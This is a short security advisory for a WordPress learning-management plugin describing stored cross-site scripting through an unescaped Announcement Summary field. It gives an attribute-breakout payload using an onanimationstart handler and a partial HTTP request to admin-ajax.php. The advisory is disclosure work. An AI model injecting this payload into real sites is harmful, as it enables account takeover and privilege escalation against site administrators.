The plugin did not escape the Summary field of Announcements (when outputting it in an attribute), which can be created by users as low as Tutor Instructor. This lead to a Stored Cross-Site Scripting issue, which is triggered when viewing the Announcements list, and could result in privilege escalation when viewed by an admin.
Proof of Concept
As a Tutor Instructor, Create an Announcement and put the following payload in the Summary field: " style="animation-name:rotation" onanimationstart="alert(/XSS/)//
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: [Tutor Instructor+]